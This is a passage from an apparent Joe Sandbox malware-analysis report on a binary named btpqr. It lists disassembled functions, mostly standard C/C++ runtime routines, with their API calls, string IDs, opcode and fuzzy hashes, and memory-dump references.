                                                                                                                        • Instruction ID: eaa6246329ad58d9d1220f5354a8a4a687a555d66aff6289f42e66b3ddbe36de
                                                                                                                        • Opcode Fuzzy Hash: 982e2164bb59cf4b8056dad0feacf5aacf8e6fbb1f88df329891634e594977d6
                                                                                                                        • Instruction Fuzzy Hash: 0F019EF1B047004BEE209A66D815B1B72E85F10744F04493EE84AA77C2E67DF6188BAB
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00402C20 Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 338COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1377385430.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1377371770.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377407672.000000000041E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377423905.0000000000427000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377451962.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_btpqr.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _strcspn$_localeconv
                                                                                                                        • String ID: @A$DA
                                                                                                                        • API String ID: 3678913754-1653914641
                                                                                                                        • Opcode ID: a26d786aa5be9133c7538eeb3d81fdfb540aed35c0fa9302c2628335408fa2e6
                                                                                                                        • Instruction ID: c9bef8a075a3ea14dc46d45a2eb25239d880b8384c570694d9792d4df51cf968
                                                                                                                        • Opcode Fuzzy Hash: a26d786aa5be9133c7538eeb3d81fdfb540aed35c0fa9302c2628335408fa2e6
                                                                                                                        • Instruction Fuzzy Hash: BAD16A71900109AFDF10DF98C994AEEBBBAFF48304F14416AF805B7292D779AE41CB95
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 0041032D Relevance: 9.0, APIs: 6, Instructions: 45threadCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __init_pointers.LIBCMT ref: 0041032D
                                                                                                                          • Part of subcall function 0040DDD0: EncodePointer.KERNEL32(00000000,?,00410332,00409544,00425B90,00000014), ref: 0040DDD3
                                                                                                                          • Part of subcall function 0040DDD0: __initp_misc_winsig.LIBCMT ref: 0040DDF4
                                                                                                                        • __mtinitlocks.LIBCMT ref: 00410332
                                                                                                                          • Part of subcall function 00409786: InitializeCriticalSectionAndSpinCount.KERNEL32(004290E0,00000FA0,?,?,00410337,00409544,00425B90,00000014), ref: 004097A4
                                                                                                                        • __mtterm.LIBCMT ref: 0041033B
                                                                                                                        • __calloc_crt.LIBCMT ref: 00410360
                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00410389
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1377385430.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1377371770.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377407672.000000000041E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377423905.0000000000427000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377451962.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_btpqr.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CountCriticalCurrentEncodeInitializePointerSectionSpinThread__calloc_crt__init_pointers__initp_misc_winsig__mtinitlocks__mtterm
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1171689812-0
                                                                                                                        • Opcode ID: df21a46978e7fe4f6422e510a3d31551a32865a5aa08722c83dca15d5828ced2
                                                                                                                        • Instruction ID: 0d4a00472c13bce6114d74e87497c4d8ef270c3172c233f510d2d869386449f8
                                                                                                                        • Opcode Fuzzy Hash: df21a46978e7fe4f6422e510a3d31551a32865a5aa08722c83dca15d5828ced2
                                                                                                                        • Instruction Fuzzy Hash: B8F06232548721ABE62476767C077C72A809B51779F204A3FF8B9E61D1EBA889C2419C
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00406958 Relevance: 9.0, APIs: 6, Instructions: 38COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • ____lc_codepage_func.LIBCMT ref: 0040695C
                                                                                                                        • __calloc_crt.LIBCMT ref: 0040696D
                                                                                                                          • Part of subcall function 0040AF53: __calloc_impl.LIBCMT ref: 0040AF62
                                                                                                                          • Part of subcall function 0040AF53: Sleep.KERNEL32(00000000), ref: 0040AF79
                                                                                                                        • ___pctype_func.LIBCMT ref: 00406980
                                                                                                                        • _memmove.LIBCMT ref: 00406989
                                                                                                                        • ___pctype_func.LIBCMT ref: 0040699A
                                                                                                                        • ____lc_locale_name_func.LIBCMT ref: 004069A6
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1377385430.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1377371770.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377407672.000000000041E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377423905.0000000000427000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377451962.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_btpqr.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ___pctype_func$Sleep____lc_codepage_func____lc_locale_name_func__calloc_crt__calloc_impl_memmove
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 284940700-0
                                                                                                                        • Opcode ID: d75bd8112281757a31cae732a73141df76780e5940e19486c24a529949ae03c6
                                                                                                                        • Instruction ID: aea3360eae170b7a53c1031bd9e77134be688ce0dba807507c5330f61a0d0def
                                                                                                                        • Opcode Fuzzy Hash: d75bd8112281757a31cae732a73141df76780e5940e19486c24a529949ae03c6
                                                                                                                        • Instruction Fuzzy Hash: EEF0C2B15047015AD7107F669806B0677D89F00318F14C83FF49EAB6C1DA3DE8508B5E
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00402770 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 73COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00402871
                                                                                                                          • Part of subcall function 00405650: __CxxThrowException@8.LIBCMT ref: 0040577D
                                                                                                                          • Part of subcall function 00405650: __CxxThrowException@8.LIBCMT ref: 0040579D
                                                                                                                          • Part of subcall function 00405650: __CxxThrowException@8.LIBCMT ref: 004057B8
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1377385430.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1377371770.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377407672.000000000041E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377423905.0000000000427000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377451962.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_btpqr.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Exception@8Throw$Ios_base_dtorstd::ios_base::_
                                                                                                                        • String ID: 8A$LA$qerrrttt.$A
                                                                                                                        • API String ID: 2823994529-1914960203
                                                                                                                        • Opcode ID: 659c7c9a071d372c7fae5c01efb59a60aef7c333844c7f5ee801fe6ab0b2112e
                                                                                                                        • Instruction ID: fb1bf560d20b8678f62f7ecc038f84b4bf07cae56b60ca27a0f9219637644c70
                                                                                                                        • Opcode Fuzzy Hash: 659c7c9a071d372c7fae5c01efb59a60aef7c333844c7f5ee801fe6ab0b2112e
                                                                                                                        • Instruction Fuzzy Hash: E6317E34700318AFDB10DF55C846F9AB7A4AF05304F1080AAF94D6B2D1DB74AD89CF46
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00411BEB Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 47COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 004101F3: __getptd_noexit.LIBCMT ref: 004101F4
                                                                                                                        • __lock.LIBCMT ref: 00411C28
                                                                                                                        • InterlockedDecrement.KERNEL32(?), ref: 00411C45
                                                                                                                        • _free.LIBCMT ref: 00411C58
                                                                                                                        • InterlockedIncrement.KERNEL32(00713A30), ref: 00411C70
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1377385430.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1377371770.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377407672.000000000041E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377423905.0000000000427000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377451962.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_btpqr.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Interlocked$DecrementIncrement__getptd_noexit__lock_free
                                                                                                                        • String ID: 0:q
                                                                                                                        • API String ID: 2704283638-3649151825
                                                                                                                        • Opcode ID: 4397255d2cf064546504a68f027dc8adbe81c32d77eb9da381f824ad1c66c018
                                                                                                                        • Instruction ID: f417f7b3b40876b8226a6af1e134936137c4e2e9f048e4b48827e7bfe984e31f
                                                                                                                        • Opcode Fuzzy Hash: 4397255d2cf064546504a68f027dc8adbe81c32d77eb9da381f824ad1c66c018
                                                                                                                        • Instruction Fuzzy Hash: 85018E31B816219BDB20AB6699057DAB7606B00720F00802BEA01673A0D77C5DC2CFDD
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00418FA4 Relevance: 7.8, APIs: 5, Instructions: 259COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 004101F3: __getptd_noexit.LIBCMT ref: 004101F4
                                                                                                                        • __invoke_watson.LIBCMT ref: 004191BC
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1377385430.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1377371770.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377407672.000000000041E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377423905.0000000000427000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377451962.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_btpqr.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: __getptd_noexit__invoke_watson
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2533157543-0
                                                                                                                        • Opcode ID: b911992bd99b12d8214eb4bfbd25c0cc307b59397655b3af73b164bd50a0f188
                                                                                                                        • Instruction ID: 39977fd7417bf924d26e73d05843b8b38d4593138b017d0d2770cc730a86a45a
                                                                                                                        • Opcode Fuzzy Hash: b911992bd99b12d8214eb4bfbd25c0cc307b59397655b3af73b164bd50a0f188
                                                                                                                        • Instruction Fuzzy Hash: 7071E471900611AAEF14AA25CC96FFB77ACEF04304F1440AEFD05DA186EB3CDDC58A69
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00401B70 Relevance: 7.6, APIs: 5, Instructions: 69COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00401B7B
                                                                                                                          • Part of subcall function 0040677D: __lock.LIBCMT ref: 0040678E
                                                                                                                        • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00401BBF
                                                                                                                          • Part of subcall function 00406E3E: _setlocale.LIBCMT ref: 00406E45
                                                                                                                          • Part of subcall function 00406E3E: _Yarn.LIBCPMT ref: 00406E5D
                                                                                                                          • Part of subcall function 00406E3E: _setlocale.LIBCMT ref: 00406E6D
                                                                                                                          • Part of subcall function 00406E3E: _Yarn.LIBCPMT ref: 00406E81
                                                                                                                        • std::exception::exception.LIBCMT ref: 00401BDE
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00401BF3
                                                                                                                        • std::exception::exception.LIBCMT ref: 00401C0B
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1377385430.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1377371770.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377407672.000000000041E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377423905.0000000000427000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377451962.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_btpqr.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Yarn_setlocalestd::_std::exception::exception$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw__lock
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 41705312-0
                                                                                                                        • Opcode ID: b83beae6e0564732d37f664b7eee04f3d0f98736a540e1fe836c82fb725a70ae
                                                                                                                        • Instruction ID: 7b12f2ed1f03a6797e13c7d7b9b19440d1379a92b4c9802516e35934317e0049
                                                                                                                        • Opcode Fuzzy Hash: b83beae6e0564732d37f664b7eee04f3d0f98736a540e1fe836c82fb725a70ae
                                                                                                                        • Instruction Fuzzy Hash: EC215E75500708AFC320DF6AC841B87BBF8AF15310F00892FE999D7A41E774E5188BE9
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 0041319C Relevance: 7.6, APIs: 5, Instructions: 67COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • _malloc.LIBCMT ref: 004131A8
                                                                                                                          • Part of subcall function 0040B126: __FF_MSGBANNER.LIBCMT ref: 0040B13D
                                                                                                                          • Part of subcall function 0040B126: __NMSG_WRITE.LIBCMT ref: 0040B144
                                                                                                                          • Part of subcall function 0040B126: RtlAllocateHeap.NTDLL(00700000,00000000,00000001,00000001,?,?,?,0040887C,00000001,00000000,?,?,?,004087B6,00406914,00000000), ref: 0040B169
                                                                                                                        • _free.LIBCMT ref: 004131BB
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1377385430.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1377371770.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377407672.000000000041E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377423905.0000000000427000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377451962.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_btpqr.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AllocateHeap_free_malloc
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1020059152-0
                                                                                                                        • Opcode ID: 007cb4591f99264318f26c37b9be09d21f13ef93252a8db8c5834184a756d67a
                                                                                                                        • Instruction ID: 78d9daa3a18d7c51f74a6bc9e1583db6add2ba5685b8f88f4b86c3d041058c6b
                                                                                                                        • Opcode Fuzzy Hash: 007cb4591f99264318f26c37b9be09d21f13ef93252a8db8c5834184a756d67a
                                                                                                                        • Instruction Fuzzy Hash: FF11C431904211BBCB303F71AC44ADB3B94EB05765B10447BFC14A62A1DB3D8E81869D
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00403410 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 79COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • _localeconv.LIBCMT ref: 00403436
                                                                                                                        • __Getcvt.LIBCPMT ref: 00403441
                                                                                                                          • Part of subcall function 00406AC1: ____lc_codepage_func.LIBCMT ref: 00406AD8
                                                                                                                          • Part of subcall function 00406AC1: ____mb_cur_max_func.LIBCMT ref: 00406AE1
                                                                                                                          • Part of subcall function 00406AC1: ____lc_locale_name_func.LIBCMT ref: 00406AE9
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1377385430.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1377371770.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377407672.000000000041E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377423905.0000000000427000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377451962.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_btpqr.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Getcvt____lc_codepage_func____lc_locale_name_func____mb_cur_max_func_localeconv
                                                                                                                        • String ID: false$true
                                                                                                                        • API String ID: 1835574032-2658103896
                                                                                                                        • Opcode ID: 962b0609e3cee0c74323de40bc5197930a452201ea4a4253718b4cb40d28741f
                                                                                                                        • Instruction ID: 33932cea3c9bb95250a1ae94980dc65b2fb271a95edafe8572106c3ab0acd18c
                                                                                                                        • Opcode Fuzzy Hash: 962b0609e3cee0c74323de40bc5197930a452201ea4a4253718b4cb40d28741f
                                                                                                                        • Instruction Fuzzy Hash: 2331A0B2900744AFC720DF55C841BAABBB8FB05710F14866FE895AB781D739AA04CB95
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00419273 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1377385430.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1377371770.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377407672.000000000041E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377423905.0000000000427000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377451962.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_btpqr.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcscmp
                                                                                                                        • String ID: ACP$OCP
                                                                                                                        • API String ID: 856254489-711371036
                                                                                                                        • Opcode ID: 51e3aed281588a7acfbb31ede4ca30abccfa29d5f2981b1a56c036e11237a1ee
                                                                                                                        • Instruction ID: 2d1ea498adb3ba63fc6d3bc0f0ace6bc37d15cc290caa85b413ec3043269c666
                                                                                                                        • Opcode Fuzzy Hash: 51e3aed281588a7acfbb31ede4ca30abccfa29d5f2981b1a56c036e11237a1ee
                                                                                                                        • Instruction Fuzzy Hash: A3018036640215B6EB10AA59EC56FE7339C9F04368F444867F908EA2C5FA7CDEC0829D
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00401630 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 0040163E
                                                                                                                          • Part of subcall function 0040677D: __lock.LIBCMT ref: 0040678E
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1377385430.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1377371770.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377407672.000000000041E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377423905.0000000000427000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377451962.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_btpqr.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: LockitLockit::___lockstd::_
                                                                                                                        • String ID: bad cast
                                                                                                                        • API String ID: 3308673574-3145022300
                                                                                                                        • Opcode ID: ed09f3de92fc85771e9d944e0beea12421092af73e97b46a3b8083d3b8f516c2
                                                                                                                        • Instruction ID: f1cdc15b0eccd7f5b6296df2b25560502995c0f7552505f2af69a5777f375224
                                                                                                                        • Opcode Fuzzy Hash: ed09f3de92fc85771e9d944e0beea12421092af73e97b46a3b8083d3b8f516c2
                                                                                                                        • Instruction Fuzzy Hash: 5F01F531A00208ABCB10EEA5DD81DAEB7389F14318F64057EE914772E2DB359D46C6D8
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00401430 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 57COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 0040143E
                                                                                                                          • Part of subcall function 0040677D: __lock.LIBCMT ref: 0040678E
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1377385430.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1377371770.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377407672.000000000041E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377423905.0000000000427000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377451962.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_btpqr.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: LockitLockit::___lockstd::_
                                                                                                                        • String ID: bad cast
                                                                                                                        • API String ID: 3308673574-3145022300
                                                                                                                        • Opcode ID: bcbbded7ed6c22557def83a2de5700ad4bd3662b35e4ba9d3082c3afc2fbf565
                                                                                                                        • Instruction ID: 624ce0f69c3c22d8d5a0aa404d975926a763002ff14f06c66473b9179ddb5bd2
                                                                                                                        • Opcode Fuzzy Hash: bcbbded7ed6c22557def83a2de5700ad4bd3662b35e4ba9d3082c3afc2fbf565
                                                                                                                        • Instruction Fuzzy Hash: 9E01F931A00208ABCB11EE95ED81EAEB7389F54318F60017EED04772F2DB385E46C6D8
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00401530 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 57COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 0040153E
                                                                                                                          • Part of subcall function 0040677D: __lock.LIBCMT ref: 0040678E
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1377385430.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1377371770.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377407672.000000000041E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377423905.0000000000427000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377451962.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_btpqr.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: LockitLockit::___lockstd::_
                                                                                                                        • String ID: bad cast
                                                                                                                        • API String ID: 3308673574-3145022300
                                                                                                                        • Opcode ID: 0c2b51249a291dae00f1ced14f9a807b32092bef10e113702db0f112a7c779dd
                                                                                                                        • Instruction ID: 89f7bf7c448c4c57a471aef0f8fedbf84e1cee05600ac115cb0aa6fbf73816a0
                                                                                                                        • Opcode Fuzzy Hash: 0c2b51249a291dae00f1ced14f9a807b32092bef10e113702db0f112a7c779dd
                                                                                                                        • Instruction Fuzzy Hash: 8801F931A00208ABCB10EE95DD81EAE77389F54328F60017FED05772E1DB359E56C6D9
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00405F60 Relevance: 6.2, APIs: 4, Instructions: 164COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1377385430.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1377371770.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377407672.000000000041E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377423905.0000000000427000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377451962.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_btpqr.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _fgetc
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 762172173-0
                                                                                                                        • Opcode ID: 745471ade1c86940a201252c82e5d0f498c4edf94000d7fe4e4413e444d18ce1
                                                                                                                        • Instruction ID: ed9525264781c6f74258fe6bda37a63cf9567c4a3ed565da445d7e2e1c5d0014
                                                                                                                        • Opcode Fuzzy Hash: 745471ade1c86940a201252c82e5d0f498c4edf94000d7fe4e4413e444d18ce1
                                                                                                                        • Instruction Fuzzy Hash: FC515372A001199FCF14DF98C880AEEB7B9EF09314F1106AAD815F7281D776AE54CB95
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 0040A17B Relevance: 6.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1377385430.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1377371770.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377407672.000000000041E000.00000002.00000001.01000000.00000004.sdmpDownload File
